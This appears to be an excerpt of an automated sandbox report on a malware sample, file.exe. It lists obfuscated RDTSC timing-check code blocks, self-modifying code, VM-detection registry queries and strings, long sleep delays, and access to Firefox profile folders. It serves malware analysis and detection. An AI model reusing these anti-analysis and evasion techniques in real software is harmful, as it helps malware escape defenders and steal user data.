Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80C0B second address: 6F80C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007F1CB4FA4D1Eh 0x00000010 nop 0x00000011 jmp 00007F1CB4FA4D20h 0x00000016 push eax 0x00000017 jmp 00007F1CB4FA4D1Bh 0x0000001c nop 0x0000001d pushad 0x0000001e mov dh, ch 0x00000020 mov ebx, 09569024h 0x00000025 popad 0x00000026 lea eax, dword ptr [ebp-08h] 0x00000029 jmp 00007F1CB4FA4D23h 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F1CB4FA4D25h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80C85 second address: 6F80C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80C8B second address: 6F80CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1CB4FA4D26h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1CB4FA4D27h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80CFB second address: 6F80D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CB4F79650h 0x00000008 mov ah, 45h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test edi, edi 0x0000000f pushad 0x00000010 mov dh, 1Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 call 00007F1CB4F79652h 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80D2D second address: 6F80D8D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1CB4FA4D1Bh 0x00000008 sub cx, 847Eh 0x0000000d jmp 00007F1CB4FA4D29h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 js 00007F1D22E23672h 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F1CB4FA4D1Ch 0x00000023 sbb esi, 1D2BB778h 0x00000029 jmp 00007F1CB4FA4D1Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov eax, dword ptr [ebp-04h] 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80D8D second address: 6F80D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80D91 second address: 6F80D95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80D95 second address: 6F80D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80D9B second address: 6F80E59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1CB4FA4D24h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F1CB4FA4D1Bh 0x0000000f add esi, 237AD49Eh 0x00000015 jmp 00007F1CB4FA4D29h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esi+08h], eax 0x00000021 pushad 0x00000022 call 00007F1CB4FA4D1Ch 0x00000027 pushfd 0x00000028 jmp 00007F1CB4FA4D22h 0x0000002d sbb cx, D5C8h 0x00000032 jmp 00007F1CB4FA4D1Bh 0x00000037 popfd 0x00000038 pop esi 0x00000039 mov dh, 30h 0x0000003b popad 0x0000003c lea eax, dword ptr [ebx+70h] 0x0000003f jmp 00007F1CB4FA4D20h 0x00000044 push 00000001h 0x00000046 jmp 00007F1CB4FA4D20h 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F1CB4FA4D27h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80E59 second address: 6F80EC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, bx 0x0000000e mov si, bx 0x00000011 popad 0x00000012 nop 0x00000013 jmp 00007F1CB4F79655h 0x00000018 lea eax, dword ptr [ebp-18h] 0x0000001b jmp 00007F1CB4F7964Eh 0x00000020 nop 0x00000021 pushad 0x00000022 mov eax, 7C2B958Dh 0x00000027 mov edi, ecx 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c movsx edx, si 0x0000002f mov esi, 24F9FBFDh 0x00000034 popad 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80EC2 second address: 6F80EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80EC6 second address: 6F80ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80F1A second address: 6F80FBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CB4FA4D26h 0x00000009 add esi, 0B4853F8h 0x0000000f jmp 00007F1CB4FA4D1Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test edi, edi 0x0000001a pushad 0x0000001b mov di, ax 0x0000001e pushfd 0x0000001f jmp 00007F1CB4FA4D20h 0x00000024 and esi, 78BD2E58h 0x0000002a jmp 00007F1CB4FA4D1Bh 0x0000002f popfd 0x00000030 popad 0x00000031 js 00007F1D22E23452h 0x00000037 pushad 0x00000038 jmp 00007F1CB4FA4D24h 0x0000003d pushfd 0x0000003e jmp 00007F1CB4FA4D22h 0x00000043 or eax, 74DDBFE8h 0x00000049 jmp 00007F1CB4FA4D1Bh 0x0000004e popfd 0x0000004f popad 0x00000050 mov eax, dword ptr [ebp-14h] 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80FBD second address: 6F80FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80FC1 second address: 6F80FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80FC5 second address: 6F80FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80FCB second address: 6F81008 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F1CB4FA4D1Dh 0x00000014 or si, 1CB6h 0x00000019 jmp 00007F1CB4FA4D21h 0x0000001e popfd 0x0000001f mov si, A2A7h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81008 second address: 6F8109C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F7964Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1CB4F7964Ch 0x00000013 jmp 00007F1CB4F79655h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007F1CB4F79650h 0x0000001f sbb cl, 00000068h 0x00000022 jmp 00007F1CB4F7964Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov edx, 74E806ECh 0x0000002e pushad 0x0000002f mov al, 96h 0x00000031 pushfd 0x00000032 jmp 00007F1CB4F79651h 0x00000037 xor eax, 16D92B86h 0x0000003d jmp 00007F1CB4F79651h 0x00000042 popfd 0x00000043 popad 0x00000044 sub eax, eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8109C second address: 6F810A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F810A0 second address: 6F810A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F810A6 second address: 6F810E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d jmp 00007F1CB4FA4D26h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1CB4FA4D27h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F810E9 second address: 6F81101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4F79654h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81101 second address: 6F81136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e pushad 0x0000000f mov dh, cl 0x00000011 movsx edi, si 0x00000014 popad 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 jne 00007F1D22E232D2h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F1CB4FA4D1Eh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81136 second address: 6F81148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4F7964Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81148 second address: 6F8114C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8114C second address: 6F8115D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ax, dx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8115D second address: 6F81161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81161 second address: 6F811C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, 523CDA08h 0x0000000b popad 0x0000000c mov eax, dword ptr [esi] 0x0000000e jmp 00007F1CB4F79657h 0x00000013 mov dword ptr [edx], eax 0x00000015 pushad 0x00000016 mov cx, B38Bh 0x0000001a jmp 00007F1CB4F79650h 0x0000001f popad 0x00000020 mov eax, dword ptr [esi+04h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 call 00007F1CB4F7964Dh 0x0000002b pop eax 0x0000002c jmp 00007F1CB4F79651h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F811C4 second address: 6F8120A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov dh, 95h 0x00000010 pop ecx 0x00000011 mov edx, 24085458h 0x00000016 popad 0x00000017 mov eax, dword ptr [esi+08h] 0x0000001a jmp 00007F1CB4FA4D27h 0x0000001f mov dword ptr [edx+08h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8120A second address: 6F8120E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8120E second address: 6F81214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81214 second address: 6F81231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov edi, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1CB4F7964Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81231 second address: 6F81263 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c jmp 00007F1CB4FA4D1Eh 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 pushad 0x00000015 mov ax, 2A8Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b mov ah, 6Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81263 second address: 6F812BD instructions: 0x00000000 rdtsc 0x00000002 mov al, bl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [edx+10h], eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1CB4F7964Ah 0x00000011 sbb ch, FFFFFFD8h 0x00000014 jmp 00007F1CB4F7964Bh 0x00000019 popfd 0x0000001a jmp 00007F1CB4F79658h 0x0000001f popad 0x00000020 mov eax, dword ptr [esi+14h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F1CB4F79657h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F812BD second address: 6F81307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c jmp 00007F1CB4FA4D1Eh 0x00000011 mov eax, dword ptr [esi+18h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1CB4FA4D27h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81307 second address: 6F813D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+18h], eax 0x0000000c jmp 00007F1CB4F7964Eh 0x00000011 mov eax, dword ptr [esi+1Ch] 0x00000014 pushad 0x00000015 pushad 0x00000016 movzx ecx, bx 0x00000019 mov di, 88FCh 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007F1CB4F79655h 0x00000024 or ax, 1C56h 0x00000029 jmp 00007F1CB4F79651h 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [edx+1Ch], eax 0x00000033 jmp 00007F1CB4F7964Eh 0x00000038 mov eax, dword ptr [esi+20h] 0x0000003b jmp 00007F1CB4F79650h 0x00000040 mov dword ptr [edx+20h], eax 0x00000043 pushad 0x00000044 push ecx 0x00000045 pushfd 0x00000046 jmp 00007F1CB4F7964Dh 0x0000004b xor si, 0F16h 0x00000050 jmp 00007F1CB4F79651h 0x00000055 popfd 0x00000056 pop ecx 0x00000057 jmp 00007F1CB4F79651h 0x0000005c popad 0x0000005d mov eax, dword ptr [esi+24h] 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F813D7 second address: 6F81412 instructions: 0x00000000 rdtsc 0x00000002 call 00007F1CB4FA4D26h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F1CB4FA4D1Bh 0x0000000f popad 0x00000010 mov dword ptr [edx+24h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F1CB4FA4D1Bh 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81412 second address: 6F81417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81417 second address: 6F8145E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+28h] 0x0000000c jmp 00007F1CB4FA4D20h 0x00000011 mov dword ptr [edx+28h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1CB4FA4D27h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8145E second address: 6F814D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CB4F7964Fh 0x00000009 jmp 00007F1CB4F79653h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F1CB4F79658h 0x00000015 xor ecx, 0E349E48h 0x0000001b jmp 00007F1CB4F7964Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov ecx, dword ptr [esi+2Ch] 0x00000027 jmp 00007F1CB4F79656h 0x0000002c mov dword ptr [edx+2Ch], ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F814D5 second address: 6F814D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F814D9 second address: 6F814DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F814DF second address: 6F81516 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d jmp 00007F1CB4FA4D20h 0x00000012 mov word ptr [edx+30h], ax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov si, D213h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81516 second address: 6F81531 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ax, word ptr [esi+32h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1CB4F7964Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81531 second address: 6F81537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81537 second address: 6F8156C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c jmp 00007F1CB4F7964Fh 0x00000011 mov eax, dword ptr [esi+34h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1CB4F79655h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8156C second address: 6F8157C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4FA4D1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8157C second address: 6F815AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+34h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1CB4F7964Dh 0x00000012 sub al, 00000046h 0x00000015 jmp 00007F1CB4F79651h 0x0000001a popfd 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F815AE second address: 6F815D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 test ecx, 00000700h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1CB4FA4D22h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F815D0 second address: 6F815D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F815D4 second address: 6F815DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F815DA second address: 6F81619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1CB4F7964Ch 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F1D22DF776Eh 0x00000014 jmp 00007F1CB4F79657h 0x00000019 or dword ptr [edx+38h], FFFFFFFFh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 movsx edi, ax 0x00000023 mov edi, eax 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81619 second address: 6F8161F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8161F second address: 6F81623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81623 second address: 6F816C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c pushad 0x0000000d movsx edx, cx 0x00000010 pushfd 0x00000011 jmp 00007F1CB4FA4D26h 0x00000016 sub si, 2138h 0x0000001b jmp 00007F1CB4FA4D1Bh 0x00000020 popfd 0x00000021 popad 0x00000022 or dword ptr [edx+40h], FFFFFFFFh 0x00000026 jmp 00007F1CB4FA4D26h 0x0000002b pop esi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F1CB4FA4D1Dh 0x00000035 or cx, 6286h 0x0000003a jmp 00007F1CB4FA4D21h 0x0000003f popfd 0x00000040 pushfd 0x00000041 jmp 00007F1CB4FA4D20h 0x00000046 xor ax, 9D28h 0x0000004b jmp 00007F1CB4FA4D1Bh 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F816C2 second address: 6F816C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F816C7 second address: 6F816F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D25h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1CB4FA4D1Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB0BC1 second address: 6FB0BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4F7964Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB0BD3 second address: 6FB0BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B76F39 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2429
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 882
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 863
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 895
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2408
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 851
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 887
Source: C:\Users\user\Desktop\file.exe TID: 2996 Thread sleep time: -88044s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5252 Thread sleep time: -4860429s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6684 Thread sleep time: -1764882s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5480 Thread sleep time: -1726863s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4628 Thread sleep time: -1790895s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6716 Thread sleep time: -4818408s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 1060 Thread sleep time: -1702851s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6680 Thread sleep time: -1774887s >= -30000s
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\
Source: file.exe, file.exe, 00000000.00000002.4160769974.0000000000AC9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: chrome.exe, 00000004.00000002.4177722073.00001D4000060000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
